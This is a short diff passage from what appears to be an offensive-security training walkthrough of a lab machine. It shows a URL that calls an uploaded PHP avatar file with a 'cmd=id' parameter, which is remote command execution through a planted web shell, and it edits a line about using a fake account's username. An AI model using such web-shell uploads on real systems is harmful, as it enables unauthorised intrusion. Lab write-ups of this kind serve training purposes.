TeoGia/offsec-training/bbs_cute_1.md

 ```
 http://192.168.1.9/uploads/avatar_tester_bad.php?cmd=id
 ```
-> Replace tester with your username
+> Replace tester with the username of your fake account.

 We get a response like this:
 ```